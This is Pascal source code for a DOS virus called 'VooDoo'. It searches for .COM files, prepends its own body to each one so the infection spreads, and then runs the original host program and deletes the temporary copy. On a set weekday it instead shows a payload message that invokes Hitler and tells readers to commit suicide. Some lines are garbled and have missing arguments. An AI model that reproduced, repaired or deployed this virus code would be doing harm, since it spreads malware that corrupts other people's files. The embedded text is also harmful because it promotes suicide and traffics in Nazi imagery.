program VooDoo_OW_vir; uses dos; CONST VIRSIZE = 5984; var s : searchrec; fname : string; buf : array[1..VIRSIZE] of byte; buf2 : array[1..VIRSIZE] of byte; f : file; y, m, d, dow : word; p : pointer; l : longint; procedure Infect(s : string); begin GetMem(p, 65535); assign(f, paramstr(0)); reset(F, 1); blockread(f, buf, VIRSIZE); close(f); assign(f, s); reset(f, 1); l := filesize(f); blockread(f, p^, l); seek(f, 0); blockwrite(f, buf, virsize); blockwrite(f, p^, l); { blockread(f, buf2, VIRSIZE); seek(f, filesize(f)); blockwrite(f, buf2, VIRSIZE); seek(f, 0); blockwrite(f, buf, VIRSIZE);} close(f); Freemem(p, 65535); end; function Searchfile : string; var foundit : boolean; w : word; begin foundit := FALSE; FindFirst('*.com', archive, s); repeat FindNext(s); assign(f,; reset(f, 1); blockread(f, buf, 3); close(f); if (buf[1] <> byte('M')) and (buf[2] <> byte('Z')) then foundit := TRUE; until (doserror <> 0) or (foundit = TRUE); if foundit = true then Searchfile := else Searchfile := ''; end; begin asm nop; nop; nop; end; GetDate(y, m, d, dow); if dow = 5 then begin writeln; writeln('ON THE SABBATH.. THE GHOST OF HITLER SPEAKS : '); writeln; writeln('"MY FELLOW NAZI''S.. I WAS WRONG.."'); writeln('"I NOW COMMAND YOU TO COMMIT SUICIDE.. NOT GENOCIDE.."'); writeln; writeln('"DO IT.. SO THE WORLD WILL BE RID OF THE NAZIPEST..'); writeln('"AND ALL AUSLANDER CAN TRUELY BE FREE OF NAZIPHOBIA..'); writeln; writeln; writeln('NaZiPhobia (c) [VooDoo].. We support the message..'); writeln; halt; end else begin fname := Searchfile; { fname := 'c:\saddam\';} if fname <> '' then Infect(fname); GetMem(p, 65535); assign(f, paramstr(0)); reset(f, 1); l := filesize(f); blockread(f, buf, virsize); blockread(f, p^, l-virsize); close(f); assign(f, ''); rewrite(f, 1); blockwrite(f, p^, l-virsize); close(F); FreeMem(p, 65535); exec('', paramstr(1)+' '+paramstr(2)+' '+paramstr(3)); assign(f, ''); erase(f); close(f); end; end.